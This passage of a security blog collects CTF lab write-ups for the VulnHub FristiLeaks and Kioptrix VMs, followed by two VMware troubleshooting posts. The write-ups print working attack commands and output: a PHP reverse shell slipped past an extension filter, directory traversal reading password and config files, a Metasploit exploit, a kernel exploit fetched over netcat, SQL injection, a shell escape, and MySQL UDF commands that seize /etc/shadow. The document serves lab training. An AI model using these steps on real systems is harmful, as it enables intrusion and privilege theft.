vi reverse-shell.php

Make the necessary changes to insert your own local IP address and listening port.


Now setup a netcat listener to catch the connection.

nc -nlvp 8888


Bad news! Only png, jpg, gif are allowed.


Looks like things are not so easy after all.

There are many ways to configure a file upload function. Developers should consider many different things. For instance, to prevent directory traversal, they should use base() or rename the file completely (use microtime() and some random numbers). Also, check the file type and size if there is any limitation to be enforced.

The question now is, did the developer of this application implemented the file upload functionality correctly? Or is it only validating the file extension? What if I just add the .jpg extension to the php file, will it be able to bypass the validation filters?

cp reverse-shell.php reverse-shell.php.jpg

Since this is a VulnHub VM, there is no harm in trying things out! We all learn.


Surprisingly (or maybe as expected), IT WORKS!!


As hinted by the output, now is the time to go back to the “dead-end” that we have identified previously and walk the newly discovered path.

Render the following URL in your web browser:

After rendering the page, a reverse shell has been established on your local machine!

root@kali:/tmp# nc -nlvp 8888
listening on [any] 8888 ...
connect to [] from (UNKNOWN) [] 41116
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
20:59:09 up 3:45, 0 users, load average: 0.00, 0.00, 0.00
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell

Now you have a low privileged shell as user apache.


Privilege Escalation

As expected of a PHP reverse shell, the display is bad. It will repeat the characters, so the commands in screenshots from this point onwards may not be as accurate as it should be, but I will write the same command in the write-up, so don’t worry about it yeah.


Now, let us perform privilege escalation. I will not write too much about the methodology and concepts of privilege escalation in this post, as I will be digressing too much. Let us go straight into finding the interesting information on this machine!

The first thing you need to know is the environment that you are in.

Run your favourite enumeration scripts, or you can do it manually based on this guide written by g0tmi1k. It has been super useful during my journey towards obtaining OSCP certification.

Kernel information:
Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015

Specific release information:
CentOS release 6.7 (Final)

Interesting system users:

Permissions in /home directory:
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .
dr-xr-xr-x. 22 root root 4.0K Dec 16 17:13 ..
drwx------. 2 admin admin 4.0K Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod

Network information 
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 
tcp 0 0* LISTEN - 
tcp 0 0 ESTABLISHED 3001/sh 
tcp 0 0 :::80 :::* LISTEN - 
tcp 0 0 ::ffff: ::ffff: ESTABLISHED -

Software versions
Sudo version:
Sudo version 1.8.6p3

MYSQL version:
mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (x86_64) using readline 5.1

Apache version:
Server version: Apache/2.2.15 (Unix)
Server built: Aug 24 2015 17:52:49

In the above information, in your opinion, which is the most interesting ones?

For me, I would like to check the user directory:

cd /home
ls *


Notice anything interesting in the output?




Yes, you are probably right — let’s check out the text file at /home/eezeepz/notes.txt

cat /home/eezeepz/notes.txt

Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry


Nice. Now we know that Jerry has put some of the useful binary files in his directory at /home/admin, and we can execute those binaries under his (root) privilege by creating a file called “runthis” in the /tmp/ directory.

Let’s try if we can spawn a reverse shell with root privilege using this cron job!

Set up a listener just like before and create the “runthis” file.


It did not work.

Every minute, the cron job will execute the commands in runthis and update the cronresults file located within /tmp/ directory.

The current results are the following:

command did not start with /home/admin or /usr/bin

As such, it is not possible to directly spawn a reverse shell like that. We need to do it using another method.

Just to test it out, let’s try running the following command to verify that the cronjob is working fine:

/home/admin/chmod 777 /home/admin


So apparently, it works!

total 20
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod

Awesome! Now we can read the content in the /home/admin directory.

bash-4.1$ ls -l

total 632
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat
-rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod
-rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py
-rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df
-rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep
-rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt

Here are some interesting files that can be identified in the /home/admin directory:

  1. cryptpass.py
  2. cryptedpass.txt
  3. whoisyourgodnow.txt

First, the content of cryptpass.py:

bash-4.1$ cat cryptpass.py

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')

print cryptoResult

Next, the content of cryptedpass.txt:

bash-4.1$ cat cryptedpass.txt

Lastly, the content of whoisyourgodnow.txt:

bash-4.1$ cat whoisyourgodnow.txt

It is not difficult to guess that the python script was used to produce the content in cryptedpass.txt and most likely also the whoisyourgodnow.txt.

Based on the source code of cryptpass.py, I wrote a decode function to do the reverse of cryptpass.py, let’s call it decryptpass.py¬†and here’s the full source code:


By the way, I wrote the script locally before transferring it over using wget. Please feel free to write it directly on the machine to your liking!

After executing the commands, you will get 2 sets of passwords for each of the “encrypted” text from before.

  1. mVGZ3O3omkJLmy2pcuTq becomes thisisalsopw123
  2. =RFn0AKnlMHMPIzpyuTI0ITG becomes LetThereBeFristi!


I am very sure that¬†LetThereBeFristi!¬†is the password for user “fristigod”.

Let’s continue our privilege escalation, this time to “fristigod” since it is the only folder within the /home directory that we do not currently have any access to until now.

Something inside there might give us root access.

Run the following command to switch user to fristigod:

su - fristigod

standard in must be a tty

This happens because this is not a full shell. To resolve this issue, simply spawn a tty yourself (straightforward enough).

python -c 'import pty;pty.spawn("/bin/bash")'
su - fristigod

Password: LetThereBeFristi!

uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Nice, we are now user “fristigod”!

Once again, check our home directory:


ls -la

total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

Noticed something interesting?

There is a directory named .secret_admin_stuff

cd .secret_admin_stuff
ls -la

total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom


Nice try, but wrong user ;)

As kindly hinted by the error message, I might be using the binary file in a wrong way.

Let’s try to find out more about the usage of this doCom, as this is most likely the gateway to make us root. It can already run programs as root (see its permissions!).

Reviewing the /var/fristigod/.bash_history file to find clues on how to use the doCom file.

cat .bash_history

ls -lah
cd .secret_admin_stuff/
./doCom test
sudo ls
cd .secret_admin_stuff/
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
ls -lah
usermod -G fristigod fristi
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e

Did you notice that the “fristigod” user is always running the following sudo command?

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

Seems like we have to run that same command as well, before we can attempt to execute any other commands.

To verify this, simply run the following command:

sudo -l

User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

Looks like we are right. ūüôā


Let’s try it out:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Wow, that was amazing. So, what else can I run?

If I can run the id command like above, can I directly spawn myself a shell?

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Perfect! Now we can go to the¬†/root directory to check out the flag ūüôā

cd /root
ls -la

-rw-------. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt

Ain’t you excited? ūüôā

cat fristileaks_secrets.txt

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

That’s it! Congratulations, you have completed the FristiLeaks v1.3 VulnHub VM!


Thanks for following my write-up, I hope that it has been useful to you and helped you learn something new — be it the thought process or the approach towards hacking a box like this.

Also, I would say that this a very good practice machine for folks who intended to take up the OSCP certification. If you are still on the verge of deciding, check out my OSCP/PWK course review, it might be helpful to you. ūüėČ

Lastly, thanks Ar0xA for creating this VM, it was fun! Also thanks VulnHub for providing a platform for people to create and upload such CTF alike practice VMs for the community.

If you like this write-up, do also check out my other write-ups on the Kioptrix series as well.

Write-up for Kioptrix Virtual Machines from Vulnhub


I have finally completed the writeup of all 5 Kioptrix Virtual Machines (VMs) from Vulnhub.com, I hope they are helpful to you.

While they are being categorised¬†as “beginner” level challenges, I find them pretty challenging and definitely an effective training for me. I learnt many things through working on these VMs.

For your convenience, the following are the 5 writeups on Kioptrix machines,


Write-up for Kioptrix: 2014 (#5)

This is the finale post of the kioptrix series writeup.


Perform hosts discovery using nmap
> nmap -Pn -T5 –version-light

Nmap scan report for
Host is up (0.00038s latency).
Not shown: 997 filtered ports
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 00:0C:29:BD:C5:DD (VMware)

Only two ports?

Let’s use the directory buster to check if there is any interesting webpages or login form,
> dirb

+ (CODE:403|SIZE:210)
+ (CODE:200|SIZE:152)
> dirb
+ (CODE:403|SIZE:210)

No luck!

Perform Nikto vulnerability scan on the servers
> nikto -h

– Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port: 80
+ Start Time: 2016-10-27 13:52:44 (GMT8)
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sun Mar 30 01:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

We will look into this again if required. Let’s try to navigate to the web page first.

Navigating to the website hosted on HTTP server port 8080 ‚Äď it says that I don‚Äôt have the permission to access the page.


Moving on to the HTTP server port 80, it gives me the default page saying “It Works”.


However, the good news is that its source contains something that is not included in the default page.

<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

Let’s try to navigate to the mentioned URL:


Google for known vulnerabilities

Indeed, check out this website, it basically documented the multiple vulnerabilities which existed in pChart version 2.1.3 ‚Äď which consists of directory traversal and cross-site scripting.

Perform directory traversal

Using the instructions shown on the website I shared earlier, we can perform directory using the following sample code reference,


In our case, run the exact following line (replace to your target’s IP address, of course)

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

Directory traversal is working. Remember the page at port 8080, the one which denies me from viewing due to insufficient file permission?

Let’s check out the apache HTTP server settings to see what were its settings and configurations.

Note that this is a FreeBSD server, which means that the config file is located at /usr/local/etc/apache2x/httpd.conf

Bingo, it works.


The following is suspiciously interesting,

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

It basically means that the results will only be allowed to shown on Mozilla Firefox browser 4.

After some research, I have gotten the user agent information of Mozilla 4,

Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)

To use it, there are many ways. For me, I uses a Firefox plugin called Quick Preference Button. It has a lot of components with it, but you just have to change the item under Prefs>Spoof>Custom and then enter the above user agent information.


Now that you are accessing the web site using Mozilla 4 user agent, you can finally view the page,


The phptax web page information looks pretty old school.


Did some research, noticed that there are readily available modules in Metasploit to exploit on phptax.
> msfconsole
> search phptax

Matching Modules

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/http/phptax_exec 2012-10-08 excellent PhpTax pfilez Parameter Exec Remote Code Injection

> use exploit/multi/http/phptax_exec
> set rhost
> set rport 8080
> exploit

[*] Started reverse TCP double handler on
[*] – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo UPBXBAbsRsBHMrXp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo PLFkF52o2dwDMsR3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “UPBXBAbsRsBHMrXp\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “PLFkF52o2dwDMsR3\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened ( -> at 2016-10-27 14:51:35 +0800
[*] Command shell session 2 opened ( -> at 2016-10-27 14:51:35 +0800

> id

uid=80(www) gid=80(www) groups=80(www)

Now we have a limited shell as user www.

Check the kernel version
> uname -a

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

Search for vulnerability on FreeBSD version 9.0
> Check out FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation

Download and host the exploit code on your attacker machine
> nc -lvp 6666 < getr00t.c

Download it using the limited shell at your target machine
> nc -nv 6666 > r00t.c

Finally, compile the code
> gcc r00t.c
> ./a.out

[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!

> id

uid=0(root) gid=0(wheel) groups=0(wheel)

Congrats, you are now root!

> cd /root
> cat congrats.txt

If you are reading this, it means you got root (or cheated).
Congratulations either way…

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can’t enjoy them.

As with all my VMs, besides getting “root” on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and “hope” it works, but think about the traffic.. the logs… Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won’t from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren’t in “/var/log/apache/access.log”, but in “/var/log/httpd-access.log”.
It’s default document root is not “/var/www/” but in “/usr/local/www/apache22/data”.
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed “OSSEC-HIDS” and monitored a few things.
Default settings, nothing fancy but it should’ve logged a few of your attacks. Look
at the following files:
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn’t support “iNotify”, I couldn’t use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should’ve detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good…


p.s.: Keep in mind, for each “web attack” detected by OSSEC-HIDS, by
default it would’ve blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part ūüôā
Here we conclude the Kioptrix CTF series.

And yes, this concludes my Kioptrix series write-up! Cheers.

Write-up for Kioptrix: Level 1.3 (#4)

Once again, a continuation of the Kioptrix series writeup!

First of all, something different about the VM for Kioptrix level 1.3 (#4) is that unlike the rest of the previous VMs, #4 only comes with a Virtual Machine Disk (VMDK) file. As such, you cannot open it normally like what you have done for the past VMs.

Click here to view my step-by-step guide to create a VM using existing VMDK file, which is ideal in this case. 


Scan for the VM using nmap
> nmap -Pn -T5

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-26 21:29 SGT
Nmap scan report for
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:7C:1F:EC (VMware)
Scan the web server for possible web pages

Run Directory Buster
> dirb

—- Scanning URL: —-
+ (CODE:403|SIZE:330)
+ (CODE:200|SIZE:1255)
+ (CODE:200|SIZE:1255)
+ (CODE:302|SIZE:0)
+ (CODE:302|SIZE:220)
+ (CODE:403|SIZE:335)

—- Entering directory: —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

Run GoBuster
> gobuster -u ‘; -w /usr/share/wordlists/dirb/big.txt

Gobuster v1.2 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain :
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307
/images (Status: 301)
/index (Status: 200)
/john (Status: 301)
/logout (Status: 302)
/member (Status: 302)
/robert (Status: 301)

Visit the webpage hosted on target machine







Perform SQL Injection

Back to the login back, let’s try to log in as john or Robert


Simply enter the following into the login field
> username: john
> password: ‘ or 1=1 —¬†


Do the same using username “robert” and you will have the following 2 credentials for login,

  • john / MyNameIsJohn
  • robert / ADGAdsafdfwt4gadfga==

Login via SSH
> ssh john@


> ssh john@


Both users are using lshell, which is a limited shell based on Python.

After some research, seems like it is possible to escape from this shell by using the echo command to call os.system

> echo os.system(‘/bin/bash’)
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> ls -la /home/loneferret

total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw——- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history
-rw-r–r– 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout
-rw-r–r– 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r–r– 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory
-rw——- 1 root root 68 2012-02-04 10:05 .my.cnf.5086
-rw——- 1 root root 1 2012-02-04 10:05 .mysql.5086
-rw——- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history
-rw——- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history
-rw-r–r– 1 loneferret loneferret 586 2012-02-04 09:58 .profile
-rw-r–r– 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful

Check MySQL is being run by which user
> ps -ef | grep mysql

root 4892 1 0 Oct29 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
root 4934 4892 0 Oct29 ? 00:00:04 /usr/sbin/mysqld –basedir=/usr
root 4935 4892 0 Oct29 ? 00:00:00 logger -p daemon.err -t mysqld_s
john 6119 6071 0 00:57 pts/0 00:00:00 grep mysql

Good news, seems like MySQL is running as root. Let’s see if its login credentials are hard-coded in the HTTP server configuration file
> ls /var/www

checklogin.php images john logout.php robert
database.sql index.php login_success.php member.php

> cat /var/www/checklogin.php

[ … omitted … ]
$host=”localhost”; // Host name
$username=”root”; // Mysql username
$password=””; // Mysql password
$db_name=”members”; // Database name
$tbl_name=”members”; // Table name
[ … omitted … ]

Login to MySQL as user root
> mysql -u root -h localhost

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 854
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

After some research, seems like we can perform privilege escalation from a MySQL server running as root.

In essence, since we are able to access MySQL server as root, we can utilize this permission level to run something called User Defined Functions (UDF) to perform privilege escalation.

To do so, we need to download the lib_mysqludf_sys.so library, which will allow us to perform commands that can achieved our goal.

The following are its most commonly used functions,

  • sys_eval (executes an arbitrary command, and returns its output)
  • sys_exec (executes an arbitrary command, and returns it’s exit code)

However, the good news is that there is no need to download them in this case because they already exists in the VM. Thanks the creator!
> whereis lib_mysqludf_sys.so


mysql> SELECT sys_exec(‘chown john.john /etc/shadow’);

| sys_exec(‘chown john.john /etc/shadow’) |
| NULL |
1 row in set (0.00 sec)

mysql> SELECT sys_exec(‘chown john.john /etc/passwd’);

| sys_exec(‘chown john.john /etc/passwd’) |
| NULL |
1 row in set (0.00 sec)

mysql> SELECT sys_exec(‘chown -R john.john /root’);

| sys_exec(‘chown -R john.john /root’) |
| NULL |
1 row in set (0.01 sec)

> cat /root/congrats.txt


You’ve got root.

There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven’t already, check out the other VMs available on:

Thanks for playing,

No, not yet. We are not root yet, only managed to read the files of root.
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> cat /etc/shadow


Now, modify the /etc/passwd file and remove the ‚Äėx‚Äô as highlighted in red below


Modify the /etc/shadow file and remove the chars as highlighted in red below


Back to MySQL again, we will change the owner of ssh config files to john

mysql> SELECT sys_exec(‘chown -R john.john /etc/ssh’);

| sys_exec(‘chown -R john.john /etc/ssh’) |
| NULL |
1 row in set (0.00 sec)

Modify the /etc/ssh/sshd_config file and identify the following line as highlighted in red. Change it to yes.

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

And also find the following line, as highlighted in red. It should be at the very last line. Change it to no.

UsePAM yes

We are done with the edits. Save the file now and reboot the system for the changes to take effect.

> mysql> SELECT sys_exec(‘reboot’);
> ssh root@

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now logged in as root!

I came across an even faster way to get root.

Simply login to MySQL and run the following command to add robert into the admin group, so that he is able to perform sudo as an administrator.
> select sys_exec(‘usermod -a -G admin robert’);

| sys_exec(‘usermod -a -G admin robert’) |
| NULL |
1 row in set (0.03 sec)

Now, perform the sudo su command using robert account.

robert@Kioptrix4:~$ sudo su
[sudo] password for robert:
root@Kioptrix4:/home/robert# whoami

There you go, root!

Create Workstation Virtual Machine Using Existing Virtual Disks


When I download certain Virtual Machines (VM) from the internet, be it for research or practice purposes, sometimes it only comes with a Virtual Machine Disk (VMDK).

VMDK is a form of file format that describes containers for virtual hard disk drives to be used by VM such as VMware Workstation.

The problem is that when you tried to open the VMDK file on your VMware Workstation, it prompts you that the Virtual Machine Configuration (VMX) file is missing, corrupted or deleted.

To solve this issue, you need to create a new VM from scratch and do the setup by hooking it up with the existing VMDK file.

  1. In Workstation, go to File > New > Virtual Machine.
  2. Select Custom and click Next.
  3. Select the hardware compatibility you require and click Next.
  4. In the Guest Operating System Installation selection screen, select I will install the Operating System later and click Next.
  5. Provide a file name and choose the location where you want to save the virtual machine and click Next.
  6. Select the desired networking type for your virtual machine and click Next.
  7. Select Use an Existing Virtual Disk and click Next.
  8. Click Browse and navigate to the location of your existing .vmdk file and click Next.
  9. Review the settings displayed in the Summary window and click Finish.

Hope this helps!

Fixes for VM: No Internet Connectivity

Have you ever experienced situations when you Virtual Machines (VM) were unable to connect to the internet after you have boot it up?

Initially, you probably only have a loopback IP address like the following, well, you are not alone – it happened to me when I was setting up my new Kali Linux or Ubuntu VM as well.

lo        Link encap:Local Loopback
          inet addr:  Mask:
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:56011078 errors:0 dropped:0 overruns:0 frame:0
          TX packets:56011078 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:4792283266 (4.4 GiB)  TX bytes:4792283266 (4.4 GiB)

You have probably restarted your networking services,

service restart networking

Or performed all kind of different steps, configuring your network, subnet, dhcp, etc information at /etc/network/interfaces but to no avail… you probably have an IP address, but you cannot connect to the internet.

ping: www.google.com: Name or service not known

Today, I am going to share a fix for this issue. It is actually very simple, but it took me a series of troubleshooting before I discover these simple steps to resolve this issue.

Step 1:¬†Simply download the vmnetcfg.exe file, you can easily find an updated copy of the file from the internet. Don’t forget to scan it using virustotal, make it a habit.

By the way, if you are interested, vmnetcfg.exe¬†is a tool which allow users to manage a Windows host computer’s virtual interfaces.

Step 2: Place the vmnetcfg.exe file inside your program files folder.

It is probably located at the¬†default location of “C:\Program Files (x86)\VMware\VMware Workstation” when you installed VMware Workstation to your computer.

Step 3: Here is the most important part. Run your vmnetcfg.exe file, you will find the following window appearing on your screen.

Look for your VMnet0¬†or whichever port that is mapped¬†to your machine’s network card, select the option of “Bridged (connect VMs directly to the external network)” and choose your network¬†card in the drop down list. When you are done, click “OK” and there you go,¬†your issue is probably fixed.


Well, I hope that this post has served you well and helped you save some time.